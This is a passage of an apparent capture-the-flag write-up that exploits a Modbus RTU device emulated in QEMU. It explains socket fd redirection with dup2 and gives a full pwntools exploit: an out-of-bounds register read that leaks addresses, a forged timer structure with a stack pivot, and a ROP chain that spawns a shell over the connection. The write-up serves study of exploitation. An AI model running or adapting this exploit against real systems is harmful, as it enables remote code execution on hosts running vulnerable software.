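    """Open a listener, connect to it, and return both server-side fds plus the echoed data."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))          # port 0: let the kernel pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    client = socket.create_connection(("127.0.0.1", port))
    conn, _peer = listener.accept()          # new socket, distinct from the listener
    fds = (listener.fileno(), conn.fileno())

    conn.sendall(message)                    # data flows over the accepted socket only
    received = b""
    while len(received) < len(message):
        chunk = client.recv(len(message) - len(received))
        if not chunk:
            break
        received += chunk

    for sock in (client, conn, listener):
        sock.close()
    return fds, received


(listen_fd, conn_fd), data = listen_and_accept()
print(listen_fd, conn_fd, data)
```

The two descriptors printed are different numbers, and only the accepted one carries traffic to the client.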
In this challenge:
ctf@7646de6860b3:~$ ps -aux|grep qemu
ctf 170 0.0 1.5 509920 24296 pts/0 Sl 10:49 0:00 ./qemu-system-x86_64 -machine none -nographic -nodefaults -chardev socket,id=mbus,host=0.0.0.0,port=1502,server=on,wait=off -device modbus-rtu,chardev=mbus,unit-id=1
ctf 175 0.0 0.1 3528 1724 pts/3 S+ 10:49 0:00 grep --color=auto qemu
ctf@7646de6860b3:~$ ls -al /proc/170/fd
total 0
dr-x------ 2 ctf ctf 11 Oct 30 10:49 .
dr-xr-xr-x 9 ctf ctf 0 Oct 30 10:49 ..
lrwx------ 1 ctf ctf 64 Oct 30 10:49 0 -> /dev/pts/0
lrwx------ 1 ctf ctf 64 Oct 30 10:49 1 -> /dev/pts/0
lrwx------ 1 ctf ctf 64 Oct 30 10:49 10 -> 'socket:[274261]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 2 -> /dev/pts/0
lrwx------ 1 ctf ctf 64 Oct 30 10:49 3 -> 'anon_inode:[eventpoll]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 4 -> 'anon_inode:[eventfd]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 5 -> 'anon_inode:[signalfd]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 6 -> 'anon_inode:[eventpoll]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 7 -> 'anon_inode:[eventfd]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 8 -> 'anon_inode:[eventfd]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 9 -> 'socket:[276587]'
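The two socket file descriptors of the QEMU process are:
/proc/170/fd/9 -> socket:[276587]: the listening socket bound to 0.0.0.0:1502.
/proc/170/fd/10 -> socket:[274261]: the connected socket returned by accept() after a client connected.
So all we need to do is use dup2 to bind stdin and stdout to fd 10, which makes system("/bin/sh") interactive over the connection.
dup2(oldfd, newfd) duplicates the already-open file or socket oldfd onto descriptor number newfd. If newfd is already in use, the kernel closes it first and then makes it refer to the same kernel object as oldfd (the same "open file description"). On success the return value is newfd.
Executing dup2(10, 0); dup2(10, 1); dup2(10, 2); connects standard input, output, and error (0/1/2) to this socket.
The sh started by the subsequent system("/bin/sh") then reads from FD 0 and writes to FD 1/2, that is, it talks over this network connection, so the remote side can drive the shell directly.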
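The same redirection can be tried locally without the exploit. The sketch below is a stand-in for the real target and assumes a Linux host with /bin/sh: it uses a socketpair instead of the TCP connection and fork/exec instead of system(). The function name is hypothetical.

```python
import os
import socket


def run_shell_over_socket(command: bytes) -> bytes:
    """Start /bin/sh with fds 0/1/2 pointing at a socket and return what it writes back."""
    parent_sock, child_sock = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        # Child: wire stdin/stdout/stderr to the socket, then become the shell.
        try:
            parent_sock.close()
            fd = child_sock.fileno()
            os.dup2(fd, 0)
            os.dup2(fd, 1)
            os.dup2(fd, 2)
            os.execv("/bin/sh", ["/bin/sh"])
        finally:
            os._exit(127)                     # only reached if execv failed

    # Parent: plays the role of the remote attacker.
    child_sock.close()
    parent_sock.sendall(command)
    parent_sock.shutdown(socket.SHUT_WR)      # EOF on the shell's stdin
    output = b""
    while True:
        chunk = parent_sock.recv(4096)
        if not chunk:
            break
        output += chunk
    os.waitpid(pid, 0)
    parent_sock.close()
    return output


print(run_shell_over_socket(b"echo hello\n"))
```

Everything the shell prints comes back over the socket, which is the behaviour the ROP chain sets up with fd 10.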
fd_guess = 10

rop = b""
# dup2(fd_guess, 0)
rop += p64(next(libc.search(asm('pop rdi; ret;'))))
rop += p64(fd_guess)
rop += p64(next(libc.search(asm('pop rsi; ret;'))))
rop += p64(0)
rop += p64(libc.sym['dup2'])

# dup2(fd_guess, 1)
rop += p64(next(libc.search(asm('pop rdi; ret;'))))
rop += p64(fd_guess)
rop += p64(next(libc.search(asm('pop rsi; ret;'))))
rop += p64(1)
rop += p64(libc.sym['dup2'])

# rdi = "/bin/sh", then jump to a hard-coded, libc-specific offset to spawn the shell
rop += p64(next(libc.search(asm('pop rdi; ret;'))))
rop += p64(next(libc.search(b'/bin/sh\x00')))
rop += p64(libc.address + 0x582d2)
Full Exploit
from pwn import *
import struct

context.log_level = 'info'
context.arch = 'amd64'

io = remote('127.0.0.1', 1502)


def crc16_modbus(b):
    crc = 0xFFFF
    for x in b:
        crc ^= x
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if (crc & 1) else (crc >> 1)
    return crc & 0xFFFF


def fc03_req(addr, start, count):
    # Request: unit id, function 0x03, start (BE), count (BE), CRC16 (LE)
    frm = bytearray([addr & 0xFF, 0x03])
    frm += struct.pack('>H', start & 0xFFFF)
    frm += struct.pack('>H', count & 0xFFFF)
    frm += struct.pack('<H', crc16_modbus(frm))
    io.send(frm)

    h = io.recvn(3)
    if h[1] & 0x80:
        ex = io.recvn(2)
        raise RuntimeError(f"exception frame: {h.hex()} {ex.hex()}")
    assert h[1] == 0x03
    bc = h[2]
    body = io.recvn(bc + 2)
    data, crc = body[:-2], body[-2:]
    if crc16_modbus(h + data) != int.from_bytes(crc, 'little'):
        log.warning("CRC mismatch")

    # Swap each byte pair to recover the in-memory byte order
    mem = b""
    for i in range(0, len(data), 2):
        if i + 1 < len(data):
            mem += data[i + 1:i + 2] + data[i:i + 1]
    return mem


def fc10_req(addr, start, data: bytes):
    if len(data) % 2 != 0:
        log.info("fc10_write: data has odd length, padding with a trailing 0x00")
        data = data + b"\x00"
    count = len(data) // 2
    if count > 125:
        raise ValueError(f"data too long: count={count} exceeds the per-frame limit of 125 "
                         f"(bounded by the 260-byte RX buffer); split it across frames.")

    frm = bytearray([addr & 0xFF, 0x10])
    frm += struct.pack('>H', start & 0xFFFF)
    frm += struct.pack('>H', count & 0xFFFF)
    frm.append((2 * count) & 0xFF)
    for i in range(0, len(data), 2):
        lo = data[i]
        hi = data[i + 1]
        hi, lo = lo, hi
        frm += struct.pack('>H', (lo | (hi << 8)) & 0xFFFF)
    frm += struct.pack('<H', crc16_modbus(frm))
    io.send(frm)

    h = io.recvn(2)
    if h[1] & 0x80:
        ex = io.recvn(3)
        if crc16_modbus(h + ex[:1]) != int.from_bytes(ex[1:], 'little'):
            log.warning("FC10 exception frame CRC mismatch")
        raise RuntimeError(f"FC10 exception: code=0x{ex[0]:02x}")
    body = io.recvn(6)
    if crc16_modbus(h + body[:-2]) != int.from_bytes(body[-2:], 'little'):
        log.warning("FC10 response CRC mismatch")
    start_echo = struct.unpack('>H', body[0:2])[0]
    count_echo = struct.unpack('>H', body[2:4])[0]
    return start_echo, count_echo


libc = ELF("./libc.so.6")
qemu = ELF("./qemu-system-x86_64")

# Stage 1: out-of-bounds read to leak libc, heap, and QEMU image addresses
leak = fc03_req(0, (0x10000 - 127), 127)[4:]
print(hexdump(leak))

libc.address = u64(leak[0x38:0x38 + 8]) - 0x203b60
success("libc base: " + hex(libc.address))
heap_base = u64(leak[0x48:0x48 + 8]) - 0xa4270
success("heap base: " + hex(heap_base))
qemu.address = u64(leak[0xe0:0xe0 + 8]) - 0x9ea35e
success("qemu base: " + hex(qemu.address))

# Stage 2: forge the QEMUTimerList, timer, and clock (placeholders are patched below)
payload_addr = heap_base + 0x82eb0

payload = b""
payload += flat({
    0: p64(0xdeaddead),
    0x8: flat({
        0x0: flat(
            p32(0), p32(0), p32(0), p32(0), p32(0),
            p16(0), p16(0),
            p64(0),
            p64(0)
        ),
        0x34: p8(1)
    }),
    0x40: p64(0xbeefbeef)
})
payload = payload.replace(p64(0xbeefbeef), p64(payload_addr + len(payload)))

"""
0x0000000000709c51 : push rax ; add byte ptr [rax - 0x75], cl ; pop rbp ; clc ; leave ; xor eax, eax ; xor edx, edx ; xor ecx, ecx ; xor esi, esi ; xor edi, edi ; ret
"""
stack_pivot = qemu.address + 0x0000000000709c51

payload += flat({
    0x0: p64(0),
    0x10: p64(stack_pivot),
    0x18: p64(0xdeadbeef)
})
payload = payload.replace(p64(0xdeaddead), p64(payload_addr + len(payload)))

payload += flat({
    0x8: p32(0),
    0xc: p8(1),
})

# Stage 3: ROP chain that redirects fds 0/1 to the client socket and spawns a shell
fd_guess = 10

rop = b""
rop += p64(next(libc.search(asm('pop rdi; ret;'))))
rop += p64(fd_guess)
rop += p64(next(libc.search(asm('pop rsi; ret;'))))
rop += p64(0)
rop += p64(libc.sym['dup2'])

rop += p64(next(libc.search(asm('pop rdi; ret;'))))
rop += p64(fd_guess)
rop += p64(next(libc.search(asm('pop rsi; ret;'))))
rop += p64(1)
rop += p64(libc.sym['dup2'])

rop += p64(next(libc.search(asm('pop rdi; ret;'))))
rop += p64(next(libc.search(b'/bin/sh\x00')))
rop += p64(libc.address + 0x582d2)

# Point the callback argument 8 bytes before the chain; `leave` consumes the first qword
payload += b"a" * 3
payload = payload.replace(p64(0xdeadbeef), p64(payload_addr + len(payload) - 8))
payload += rop

payload = flat(
    {23: payload},
    filler=cyclic(250, n=8),
    length=250
)

info("payload len: " + str(len(payload)))
print(hexdump(payload))

# Stage 4: write the payload into the register area, then trigger the overflowing read
fc10_req(0, (0x10000 - 250 // 2), payload)
fc03_req(0, 0x10000 - 0x80, 0x80)

io.interactive()
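The framing helpers in the exploit can be sanity-checked offline, without pwntools or a running target. The sketch below re-implements the same CRC routine and builds an FC03 request with the standard library only. `build_fc03_frame` is a hypothetical helper, not part of the exploit, and 0x4B37 is the published check value of CRC-16/MODBUS for the ASCII string "123456789".

```python
import struct


def crc16_modbus(data: bytes) -> int:
    """CRC-16/MODBUS: init 0xFFFF, reflected polynomial 0xA001, no final XOR."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc


def build_fc03_frame(unit: int, start: int, count: int) -> bytes:
    """Unit id, function 0x03, start and count big-endian, CRC appended little-endian."""
    body = struct.pack(">BBHH", unit, 0x03, start, count)
    return body + struct.pack("<H", crc16_modbus(body))


frame = build_fc03_frame(0, 0x10000 - 0x80, 0x80)
print(frame.hex())
print(hex(crc16_modbus(b"123456789")))
```

A frame with a correct trailing CRC has the property that running the CRC over the whole frame, CRC bytes included, yields 0, which gives a quick check for both requests and responses.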